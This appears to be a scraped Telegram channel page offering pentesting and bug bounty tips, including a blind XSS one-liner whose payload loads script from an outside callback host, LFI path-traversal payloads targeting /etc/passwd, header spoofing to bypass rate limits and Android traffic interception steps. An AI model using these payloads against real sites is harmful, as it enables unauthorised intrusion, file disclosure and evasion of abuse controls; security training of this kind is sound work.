πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
8.1K subscribers
161 photos
1 video
27 files
64 links
Offensive Security Certified Professional
@WebHacking
@pfsense
@WifiHacking
πŸ”°For safer days
Download Telegram
One Liner To Find Blind XSS
Blind XSS in Parameters

subfinder -d target.com | gau | grep "&" | bxss -appendMode -payload '"><script src=hacker.xss.ht></script>' -parameters
πŸ‘4
Pentesting Webapp Checklist for Small scope !
πŸ”₯8
Use this payloads on Email field...
πŸ‘1
Bug Bounty Tips

Sensitive Data Exposure
in ASPβ€’NET apps via /Trace.axd endpoint
πŸ‘5
Upload functionality testing
πŸ‘6πŸ‘2
Some filter bypass payload list while hunting for LFi vulnerability


β†’index.php?page=....//....//etc/passwd
β†’index.php?page=..///////..////..//////etc/passwd
β†’index.php?page=/var/www/../../etc/passwd
πŸ‘9πŸŽ‰1
This media is not supported in your browser
VIEW IN TELEGRAM
πŸ‘5πŸŽ‰1
If you need to intercept the Android traffic through BurpSuite:
1)Ensure Burp is listening to more than the loopback address
2)Allow inbound traffic on the Firewall
3)Use ADB to run "settings put global http_proxy IP PORT"
4)Download and trust the CA from http://IP/cert
5)WIN
πŸ‘10πŸ€”2
Forwarded from Web Hacking
Remote File Inclusion (RFI)
πŸ‘12πŸ”₯5
Forwarded from Web Hacking
Rate limit bypass using some custom headers:

X-Forwarded-For: IP
X-Forwarded-IP: IP
X-Client-IP: IP
X-Remote-IP: IP
X-Originating-IP: IP
X-Host: IP
X-Client: IP
πŸ‘3πŸ€”2